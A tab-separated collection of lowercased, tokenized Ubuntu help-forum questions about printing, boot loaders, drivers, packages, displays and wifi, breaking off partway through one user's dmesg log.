502479	accessing cups web interface administration with a non-root user	so firstly , i 'm not an expert in servers . i 'm using ubuntu server 13.10 and i want to make this file server a print server as well . so i 'm trying to get cups working however i 've encountered some hiccups ( as many people have ) . i am unable to access the cups admin settings on the web interface without a root user . the root user on my server is disabled and we have 2 users which are boths sudoers and in the lpadmin group . whenever the web interface asks me to login i enter one of those 2 credentials however none are accepted . here is my config file : # # # sample configuration file for the cups scheduler . see `` man cupsd.conf '' for a # complete description of this file . # # log general information in error_log - change `` warn '' to `` debug '' # for troubleshooting ... loglevel warn # deactivate cups ' internal logrotating , as we provide a better one , especially # loglevel debug2 gets usable now maxlogsize 0 # only listen for connections from the local machine . listen localhost:631 listen /var/run/cups/cups.sock listen nas:631 # show shared printers on the local network . browsing off browselocalprotocols dnssd # default authentication type , when authentication is required ... defaultauthtype basic # web interface setting ... webinterface yes # restrict access to the server ... < location / > order allow , deny allow 192.168 . * < /location > # restrict access to the admin pages ... < location /admin > order allow , deny allow 192.168 . * < /location > # restrict access to configuration files ... < location /admin/conf > authtype default require user @ system order allow , deny allow 192.168 . * < /location > # set the default printer/job policies ... < policy default > # job/subscription privacy ... jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default # job-related operations must be done by the owner or an administrator ... < limit create-job print-job print-uri validate-job > order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > require user @ owner @ system order deny , allow < /limit > # all administration operations require an administrator to authenticate ... < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default cups-get-devices > authtype default require user @ system order deny , allow < /limit > # all printer operations require a printer operator to authenticate ... < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > # only the owner or an administrator can cancel or authenticate a job ... < limit cancel-job cups-authenticate-job > require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > # set the authenticated printer/job policies ... < policy authenticated > # job/subscription privacy ... jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default # job-related operations must be done by the owner or an administrator ... < limit create-job print-job print-uri validate-job > authtype default order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > authtype default require user @ owner @ system order deny , allow < /limit > # all administration operations require an administrator to authenticate ... < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default > authtype default require user @ system order deny , allow < /limit > # all printer operations require a printer operator to authenticate ... < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > # only the owner or an administrator can cancel or authenticate a job ... < limit cancel-job cups-authenticate-job > authtype default require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > # # while i have run many searches on google so far no solution has turned up . it is also worth mentioning that this is a server without a gui . i can only operated from the terminal directly on it or using ssh . do n't ask me to install a gui as that is not an option . ( i 've read an answer here so i 'm mentioning it before i get one like it ) if you need any more info just comment below .
502480	genymotion problems	i wanted to use genymotion on my computer but the on-board graphics were far too low for the emulator to work ( i worked but very slow ) . i bought a new graphics card and now when i run my device on genymotion it misplaced on the window . ( ) . i tried genymotion on windows 7 on my other partition and it works just fine there . i upgraded ubuntu from 13.04 to 14.04 ( fresh install ) last night to see if it fixes the problem , but it did n't . i have the newest version of virtualbox and genymotion installed .
502482	how can i get available updates to show at login ?	while playing around with amazon ec2 , i noticed that the ubuntu images showed available updates at login ( see pic ) how can i get my home installation to do this ? i 'm running 14.04 . my question is specifically in reference to packages/security updates . in the image , they are represented as `` 0 packages can be updated . '' and `` 0 updates are security updates . '' all other information showed up without the fix that i referenced as a comment to the duplication flag . i 've discovered two solutions for the problem : running tasksel allows the selection of the basic ubuntu server collection an abbreviated form of tasksel appears at the end of a fresh installation , which also allows the selection of basic ubuntu server
502483	screen resolution not displaying properly on eee pc	after installation , everything works normally except for the very big icons on the screen . i checked the screen resolution and found out that it is very low , 1024x600 . i tried searching ask ubuntu and google for answers and i found some but it does n't work for me . i also tried running xrandr and create a modeline using cvt , but it always gets an error . $ xrandr screen 0 : minimum 320 x 200 , current 1024 x 600 , maximum 32767 x 32767 lvds1 connected primary 1024x600+0+0 ( normal left inverted right x axis y axis ) 220mm x 129mm 1024x600 60.0*+ 65.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) i also followed all the possible steps that i can find here : https : //wiki.ubuntu.com/x/config/resolution ubuntu 14.04 : low screen resolution it 's not only the icon size , but also the windows and their contents are even bigger . relatively . some opened windows ( i.e system settings , unity tweak tool , etc ) are extending to the other sides of the desktop . making it such a pain to configure my settings or do other stuff in my desktop .
502488	usb turn write protection off forced	i have a usb-flash device ( sandisk sdcz33 bm120423519d ) with no hardware switch , which is stuck in readonly mode : # hdparm /dev/sdf /dev/sdf : sg_io : bad/missing sense data , sb [ ] : 70 00 05 00 00 00 00 14 00 00 00 00 20 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 multcount = 0 ( off ) readonly = 1 ( on ) readahead = 256 ( on ) geometry = 30532/64/32 , sectors = 62530624 , start = 0 i 've tried to clear its r/o mode with : # hdparm -r0 /dev/sdf then tried to format it with gparted , but it fails with error messages : the files system is availabe only for read after reinstertion the flash device is still stucked in the r/o mode . the problem with r/o mode is risen after the one of halts of the host device ( raspberry pi ) . so the question is how to really clear the readonly flag ?
502490	grub badly confused ; jumps between drives during boot	i 've spent about two weeks now trying to get a box that was running 10.04 to run 14.04 . one of the ongoing problems that has been absolutely maddening is that grub has been acting really strangely . for the past few days , i 've been trying to get an alternative install of 14.04 in place so i could work on the primary one . ( primary is /dev/sda6 , alt is /dev/sda3 . ) i would make the partition , copy files over or sometimes get a usb install to work or in one case put a ( different ) drive in a different machine to get the installation in place and then dropping it back into this box . then , booting into the /sda6 , i 'd run update-grub , which would claim that it saw both installations . but when i rebooted , the alternative install was n't available on the menu . so i 'd edit /boot/grub/grub.cfg by hand , and reboot . the menu would n't change . i would look at it again ; my edits were still there , but grub was ignoring the /boot/grub/grub.cfg file on /sda6 . nor was it using /sda3 's /boot/grub/grub.cfg . sometimes there was another drive in the system , but it did n't have any grub.cfg files . that was a few days ago . i managed to get the /sda6 install booting with everything except the gui ( because , as has become abundantly clear , ubuntu 14.04 's drivers for my ati video are completely screwed up , but that 's a different issue ) . i put an .iso file for mythbuntu on my alternative partition , prepped it with grml-rescueboot , and ran update-grub . it counted through the usual vz and init files on the boot , the two mem-tests , and then said it found the grml .iso . okay . reboot . do i get the grub menu ? nope . it just went right into the /sda6 installation . i made change after change to grub.cfg and to /etc/default/grub ( changing the default number , and many other things , and running update-grub after doing so ) . no change . i tried booting off my usb stick ; it still went right into /sda6 . i tried to change the boot order to get the usb stick to go first , and found that the machine 's bios did n't recognize it as bootable . so i took the usb stick back over to the other ubuntu machine ( running 12.04 ) , and used unetbootin to copy the 64-bit server .iso back onto it . i stick it back into the machine i 'm trying to upgrade , and boot . this time , i get a grub menu . but , i get the grub menu that 's on /sda6 ! wtf ? ? ? when the hard drive ( /sda ) is the 'first ' boot device , grub completely ignores the files on /sda6 , but when i boot with the usb stick , then it uses the hard drive 's /boot files ? fine . i choose the mythbuntu .iso off the menu . it boots into that . which does me no good , because the screen started flashing and blinking , and after ten minutes , went totally black . that would be the broken video driver screwing things up . i reboot again . either grub or the mythbuntu installer has destroyed the usb 's boot records , because once again , i was not shown a grub boot menu , but instead watched it boot right back onto /sda6 . ( at the moment , that consists of seeing a lubuntu startup screen for about five seconds , and then the screen goes black . the end . ) the machine does have a dvd drive . it 's almost certainly malfunctioning ; booting off cd/dvd is not an option . nor can i move /sda to my other computer . /dev/sda is a hardware raid5 array with five drives . i 've run update-grub more times than i can count , i 've run grub-install , and grub-bios-install , i 've worked with fdisk , parted , and gdisk , and even used the firmware on the raid card to completely wipe a secondary drive so that i could try a totally clean-from-scratch install of grub onto that . i do n't think grub has ever booted this system correctly . i 'm now seriously considering just calling ubuntu 14.04 an unmitigated disaster , restoring 10.04 from my backups , and leaving it alone , since 10.04 ran without major issues on this box for four years , unless somebody can shed some light on how to get grub to do its job correctly , or point me at something besides grub that would work . thoughts ?
502493	locking down windows drive	im new to these forums but have been getting into linux lately after years of windows which i only use for gaming now and i see linux as a superior alternative for everyday use . im running the lxde desktop since i really do n't like the other alternatives . i 've managed to allow other login through gui at bootup so i can login as root . i 'm dual booting win 8.1 with ubuntu , and i would like to totally lock down the windows partition for security reasons . from what i gather no matter what flavor of linux you need to be root to change drive permissions . i would not only like to lock the windows drive due to the fact that i know there are viruses that even if your running linux will look for a windows partition to infect . so i want to lock the windows drive and set all permissions to list files only for root and nothing for other users . i tried doing this through gui and root . thing is when i right click on the drive i see no option for permissions and if i go into the drive itself and right click folder properties upon changing permissions there is no effect . my /etc/fstab is : # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > # entry for /dev/sda5 : uuid=65914ae6-cb45-4f13-9674-ba462abbddd2 / ext4 errors=remount-ro 0 1 # entry for /dev/sda1 : uuid=90a60406a603ec12 /media/system_reserved ntfs-3g defaults , locale=en_us.utf-8ââ 0 0 # entry for /dev/sda2 : uuid=c8d2169cd2168f36 /media/sda2 ntfs-3g defaults , locale=en_us.utf-8 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 # uuid=2c56d661-4571-416c-836a-e7d6c8cb1160 none swap sw 0 0 can someone please help me with this so i can have peace of mind when i 'm using linux and i will know for sure my windows drive is safe ?
502494	show 1 to n on the terminal	i am looking for simple thing just , foo 8 will shows this : 1 2 3 4 5 6 7 8 ps : i am looking just for command line . i know how to create that by using for on the bash
502499	how to seed the apt and/or dpkg database of packages ?	i have this system that has a basic ubuntu 12.04.4 lts installation on it , but no network access . i have this set of deb packages which have been copied to some location on said machine . how do i get dpkg and/or apt to recognise these packages as available ? i thought $ sudo dpkg -- recursive -- record-avail would do it , and it does see each package and reports `` recorded info about âś '' for each one , but later attempts to $ sudo apt-get install or $ sudo dpkg -i fail just as before the 'record-avail ' . i think i 'm close but missing something .
502500	can not boot from usb , need help	i wanted to format my w7 drive and install ubuntu , so i have made an ubuntu 14 . 04 bootable usb , but when i try to boot from that usb it gives this message : attempting boot from usb normally it should boot after this message , but it does not go any further . i also have made a lubuntu 14.04 bootable usb after that , which did not boot same as ubuntu 14 . 04 . there is no problem with usb disk , since the same usb disk can boot with w7 installation .
502503	why does do-release-upgrade on 12.04 system not find 14.04.1 upgrade ?	i saw an article that 14.04.1 was released today so i went to update an lts machine but it did n't find an update . $ sudo do-release-upgrade checking for a new ubuntu release no new release found $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise what 's the criteria for getting upgrades for lts releases ?
502509	uninstall then install makes vstpd service unrecognized , vsftpd : unrecognized service	i installed vsftpd on my server using this and this link . but due to this error i followed the solution and tried to update the vsftpd . but because of some configuration problem it was not functioning and i decided to reinstall it using this problem 's solutions . but now after installing it again when i type : sudo service vsftpd restart or sudo /etc/init.d/vsftpd restart it shows me : vsftpd : unrecognized service . and sudo : /etc/init.d/vsftpd : command not found how to solve this ?
502522	desktop icons appear in the centre of two monitor 's	the problem i have been seeing is in ubuntu 14.04 lts when using a hyundai ( primary monitor ) and a dell ( secondary monitor ) to effectively have an extended screen layout . when i start-up my desktop icons appear in the middle of the two monitors . the group of icons bunched together is on the right of my hyundai but the left side of the dell . they are supposed to be in the centre of the dell monitor . i have noticed that this only happens about once or twice a week and sometimes rebooting moves them to where i put them originally . i have been using linux for over 3 years now but my command line knowledge is limited .
502523	problem with source list	i 'm getting the message : e : malformed line 59 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . how can i fix it ?
502524	i am not able to compile a simple program using gcc	wrongly i have install ia32-libs but my host system is 64 bit . now whenever i try to compile c file i get a message as : unrecognized option ' -- 64' i have uninstall th ia32-libs but i am getting same error . then i have uninstall the gcc , g++ , multilib and build-essenstial using purge command . again install these packages using apt-get command but again same error . when i run `` which gcc '' command on terminal i get `` /usr/bin/gcc `` and `` which ld '' output is `` /usr/bin/ld '' . i guess both outputs are correct . when i run this command g++ -v hello hello.c then output is using built-in specs . collect_gcc=g++ collect_lto_wrapper=/usr/lib/gcc/x86_64-linux-gnu/4.6/lto-wrapper target : x86_64-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu/linaro 4.6.3-1ubuntu5 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.6/readme.bugs -- enable-languages=c , c++ , fortran , objc , obj-c++ -- prefix=/usr -- program-suffix=-4.6 -- enable-shared -- enable-linker-build-id -- with-system-zlib -- libexecdir=/usr/lib -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.6 -- libdir=/usr/lib -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-libstdcxx-time=yes -- enable-gnu-unique-object -- enable-plugin -- enable-objc-gc -- disable-werror -- with-arch-32=i686 -- with-tune=generic -- enable-checking=release -- build=x86_64-linux-gnu -- host=x86_64-linux-gnu -- target=x86_64-linux-gnu thread model : posix gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) collect_gcc_options='-v ' '-shared-libgcc ' '-mtune=generic ' '-march=x86-64' /usr/lib/gcc/x86_64-linux-gnu/4.6/cc1plus -quiet -v -imultilib . -imultiarch x86_64-linux-gnu -d_gnu_source he.c -quiet -dumpbase he.c -mtune=generic -march=x86-64 -auxbase he -version -fstack-protector -o /tmp/cciqsmoy.s gnu c++ ( ubuntu/linaro 4.6.3-1ubuntu5 ) version 4.6.3 ( x86_64-linux-gnu ) compiled by gnu c version 4.6.3 , gmp version 5.0.2 , mpfr version 3.1.0-p3 , mpc version 0.9 ggc heuristics : -- param ggc-min-expand=100 -- param ggc-min-heapsize=131072 ignoring nonexistent directory `` /usr/local/include/x86_64-linux-gnu '' ignoring nonexistent directory `` /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../x86_64-linux-gnu/include '' include `` ... '' search starts here : include < ... > search starts here : /usr/include/c++/4.6 /usr/include/c++/4.6/x86_64-linux-gnu/ . /usr/include/c++/4.6/backward /usr/lib/gcc/x86_64-linux-gnu/4.6/include /usr/local/include /usr/lib/gcc/x86_64-linux-gnu/4.6/include-fixed /usr/include/x86_64-linux-gnu /usr/include end of search list . gnu c++ ( ubuntu/linaro 4.6.3-1ubuntu5 ) version 4.6.3 ( x86_64-linux-gnu ) compiled by gnu c version 4.6.3 , gmp version 5.0.2 , mpfr version 3.1.0-p3 , mpc version 0.9 ggc heuristics : -- param ggc-min-expand=100 -- param ggc-min-heapsize=131072 compiler executable checksum : 65b5171ac1bd7b3f07dbea6bdb24be3d collect_gcc_options='-v ' '-shared-libgcc ' '-mtune=generic ' '-march=x86-64' as -- 64 -o /tmp/ccxdnoi3.o /tmp/cciqsmoy.s **as : unrecognized option ' -- 64'** can you tell me how to solve this problem ? ?
502526	how to find if my hardware supported by ubuntu ?	it is better to let make sure if system can/will be worked effectively & efficiently . so , before installing ubuntu , i have question as follows : i want to know how can i find if my hardware like motherboard components , graphics card etc supported by ubuntu ? can i find through model or chipset or as better as possible ? this is simple general question asked by new-user .
502533	custom ubuntu 14.04 trusty tahr live iso - for trafficsqueezer	i want to make custom ubuntu v14.04 based live iso with my trafficsqueezer stuff in it . this allows users to directly use this live iso directly as a wan optimization device without installation . trafficsqueezer is a kernel based solution , so i need to boot this iso with my custom kernel . for gui trafficsqueezer is based on php/apache/mysql . so for gui the live iso should contain php-apache , php-mysql , apache , as well mysql db , tables pre-installed and set . can anyone help me or volunteer in this process please ? i tried some guide making custom isos with ubuntu ( without remastersys , uck tools ) , but they are bit old and i am having issues in bootup ( even without trafficsqueezer kernel in it ) . so looking for an expert guidance . cheers , kiran founder : trafficsqueezer ( www.trafficsqueezer.org )
502535	deleted swap partition , windows does n't work	today i wanted to un install kali , but i started from deleting swap partitions one 7.8gb and one 8.9gb ( i did this in windows ) i turned off the computer and to my surprise grub recovery came up . i tried to fix it so i put in a ubuntu live disk and installed and ran boot-recovery it worked now i have : ~ubuntu ~kali but no windows option im really scared please help i have a `` triple booted '' system on it is kali ( newest one ) windows 8.1 and ubuntu 14.04 a 2 tb hdd , an asus mobo , an amd 8350 cpu and a radeon 7770 2gb
502541	how can you change position of a machine in juju ?	after i have destroyed a machine with the following command : $ : juju destroy-machine -- force 3 in an juju environment . my question is ; is there a way to say to a new node added in juju to use as id the `` 3 '' so that to have an right order of the machines ?
502543	how can i recover from system crash after graphics driver update ?	i had been using ubuntu 12 . after 4 months the update manager recommended a hardware upgrade for the first time , apparently a video card driver update . i updated and the system crashed . i have no graphics at all . i can only boot to console mode . the failsafe option under recovery mode did not help . one log says : âfailed to load nvidia kernel module . screens found , but none have a usable configuration.â my graphics card is nvidia geforce 8400m gs . i had been using this driver : nvidia 331 . i tried to re-install this driver in console mode with these commands : sudo apt-get install nvidia-331 . the result was : the following packages have unmet dependencies : nvidia-331 : depends : x-org-video-abi-11 or x-org-video-abi-12 but it is not installable or x-org-video-abi-13 or x-org-video-abi-14 e : unable to correct problem , you have held broken packages . any suggestions ?
502544	how to remap gamepad axis ?	i am a linux newbie and i need help remapping my gamepad , a twin gamepad actually ( gamebird jpd-st03 ) the problem is that for some reason axis 2 acts as axis 3 and vice versa ... so when i move it upwards phisically in games it moves to the left ... i tried using jstest-gtk and i managed to remap them but it dose n't seem to affect any games at all ... it worked fine on windows ( using x360ce emulator ) and also works fine on a game that runs using wine ( without the x360ce emulator )
502545	wireless connection drops on intel centrino 6235	i am in a wifi network at school which has secure access and i have been using it for months now , but the problem started a few days ago . every 3-5 minutes i lose internet access , but retain the network connection . i work in a cubicle block and other people around me have the same computer and do not have the same problem . my hardware is : 02:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6235 [ 8086:088e ] ( rev 24 ) the dmesg log shows trying to reconnect numerous times : [ 1302.144315 ] wlan0 : authenticated [ 1302.146992 ] wlan0 : associate with e8:40:40 : de:84:0e ( try 1/3 ) [ 1302.149488 ] wlan0 : rx assocresp from e8:40:40 : de:84:0e ( capab=0x11 status=0 aid=6 ) [ 1302.151583 ] wlan0 : associated [ 1302.151737 ] cfg80211 : calling crda for country : us [ 1302.158666 ] cfg80211 : regulatory domain changed to country : us [ 1302.158675 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1302.158680 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1302.158685 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1302.158688 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1302.158692 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1302.158695 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1302.158699 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1302.158703 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1337.260080 ] wlan0 : authenticate with e8:40:40 : de:83 : de [ 1337.264195 ] wlan0 : send auth to e8:40:40 : de:83 : de ( try 1/3 ) [ 1337.267376 ] cfg80211 : calling crda to update world regulatory domain [ 1337.272327 ] cfg80211 : world regulatory domain updated : [ 1337.272331 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1337.272334 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1337.272336 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1337.272338 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1337.272340 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1337.272342 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1337.441577 ] wlan0 : authenticated [ 1337.441763 ] wlan0 : waiting for beacon from e8:40:40 : de:83 : de [ 1338.039990 ] wlan0 : authenticate with e8:40:40 : de:83 : d1 [ 1338.043779 ] wlan0 : direct probe to e8:40:40 : de:83 : d1 ( try 1/3 ) [ 1338.247708 ] wlan0 : direct probe to e8:40:40 : de:83 : d1 ( try 2/3 ) [ 1338.451806 ] wlan0 : direct probe to e8:40:40 : de:83 : d1 ( try 3/3 ) [ 1338.655819 ] wlan0 : authentication with e8:40:40 : de:83 : d1 timed out [ 1338.975657 ] wlan0 : authenticate with e8:40:40 : de:84:01 [ 1338.979325 ] wlan0 : direct probe to e8:40:40 : de:84:01 ( try 1/3 ) [ 1339.180150 ] wlan0 : direct probe to e8:40:40 : de:84:01 ( try 2/3 ) [ 1339.384220 ] wlan0 : direct probe to e8:40:40 : de:84:01 ( try 3/3 ) [ 1339.588344 ] wlan0 : authentication with e8:40:40 : de:84:01 timed out [ 1339.916331 ] wlan0 : authenticate with e8:40:40 : de:84:0e [ 1339.920502 ] wlan0 : send auth to e8:40:40 : de:84:0e ( try 1/3 ) [ 1340.077258 ] wlan0 : authenticated [ 1340.080528 ] wlan0 : associate with e8:40:40 : de:84:0e ( try 1/3 ) [ 1340.084215 ] wlan0 : rx assocresp from e8:40:40 : de:84:0e ( capab=0x11 status=0 aid=6 ) [ 1340.086033 ] wlan0 : associated [ 1340.086179 ] cfg80211 : calling crda for country : us [ 1340.092255 ] cfg80211 : regulatory domain changed to country : us [ 1340.092260 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1340.092265 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1340.092268 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1340.092271 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1340.092275 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1340.092279 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1340.092282 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1340.092286 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1345.335289 ] cfg80211 : calling crda to update world regulatory domain [ 1345.343514 ] cfg80211 : world regulatory domain updated : [ 1345.343523 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1345.343528 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1345.343532 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1345.343536 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1345.343540 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1345.343543 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1345.600092 ] wlan0 : authenticate with e8:40:40 : df:3c:51 [ 1345.603976 ] wlan0 : direct probe to e8:40:40 : df:3c:51 ( try 1/3 ) [ 1345.807113 ] wlan0 : direct probe to e8:40:40 : df:3c:51 ( try 2/3 ) [ 1346.011298 ] wlan0 : direct probe to e8:40:40 : df:3c:51 ( try 3/3 ) [ 1346.215386 ] wlan0 : authentication with e8:40:40 : df:3c:51 timed out [ 1346.421490 ] wlan0 : authenticate with e8:40:40 : df:3c:5e [ 1346.426389 ] wlan0 : direct probe to e8:40:40 : df:3c:5e ( try 1/3 ) [ 1346.627589 ] wlan0 : direct probe to e8:40:40 : df:3c:5e ( try 2/3 ) [ 1346.831676 ] wlan0 : direct probe to e8:40:40 : df:3c:5e ( try 3/3 ) [ 1347.035754 ] wlan0 : authentication with e8:40:40 : df:3c:5e timed out [ 1347.188938 ] wlan0 : authenticate with e8:40:40:73:24:61 [ 1347.193573 ] wlan0 : send auth to e8:40:40:73:24:61 ( try 1/3 ) [ 1347.220771 ] wlan0 : send auth to e8:40:40:73:24:61 ( try 2/3 ) [ 1347.246409 ] wlan0 : send auth to e8:40:40:73:24:61 ( try 3/3 ) [ 1347.271798 ] wlan0 : authentication with e8:40:40:73:24:61 timed out [ 1350.225149 ] wlan0 : authenticate with e8:40:40 : df:66 : a1 [ 1350.228523 ] wlan0 : send auth to e8:40:40 : df:66 : a1 ( try 1/3 ) [ 1350.333209 ] wlan0 : send auth to e8:40:40 : df:66 : a1 ( try 2/3 ) [ 1350.334445 ] wlan0 : authenticated [ 1350.334920 ] wlan0 : waiting for beacon from e8:40:40 : df:66 : a1 [ 1350.385317 ] wlan0 : associate with e8:40:40 : df:66 : a1 ( try 1/3 ) [ 1350.389597 ] wlan0 : rx assocresp from e8:40:40 : df:66 : a1 ( capab=0x431 status=0 aid=1 ) [ 1350.391735 ] wlan0 : associated [ 1350.391967 ] cfg80211 : calling crda for country : us [ 1350.399655 ] cfg80211 : regulatory domain changed to country : us [ 1350.399664 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1350.399669 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1350.399674 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1350.399677 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1350.399681 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1350.399684 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1350.399688 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1350.399692 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1368.358146 ] cfg80211 : calling crda to update world regulatory domain [ 1368.366211 ] cfg80211 : world regulatory domain updated : [ 1368.366220 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1368.366226 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1368.366230 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1368.366234 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1368.366238 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1368.366241 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1368.655644 ] wlan0 : authenticate with e8:40:40:73 : f2:51 [ 1368.660406 ] wlan0 : direct probe to e8:40:40:73 : f2:51 ( try 1/3 ) [ 1368.861864 ] wlan0 : direct probe to e8:40:40:73 : f2:51 ( try 2/3 ) [ 1369.065904 ] wlan0 : send auth to e8:40:40:73 : f2:51 ( try 3/3 ) [ 1369.068259 ] wlan0 : authenticated [ 1369.069932 ] wlan0 : associate with e8:40:40:73 : f2:51 ( try 1/3 ) [ 1369.074161 ] wlan0 : rx assocresp from e8:40:40:73 : f2:51 ( capab=0x431 status=0 aid=2 ) [ 1369.076196 ] wlan0 : associated [ 1369.076333 ] cfg80211 : calling crda for country : us [ 1369.082750 ] cfg80211 : regulatory domain changed to country : us [ 1369.082759 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1369.082767 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1369.082774 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1369.082780 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1369.082787 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1369.082793 ] cfg80211 : ( 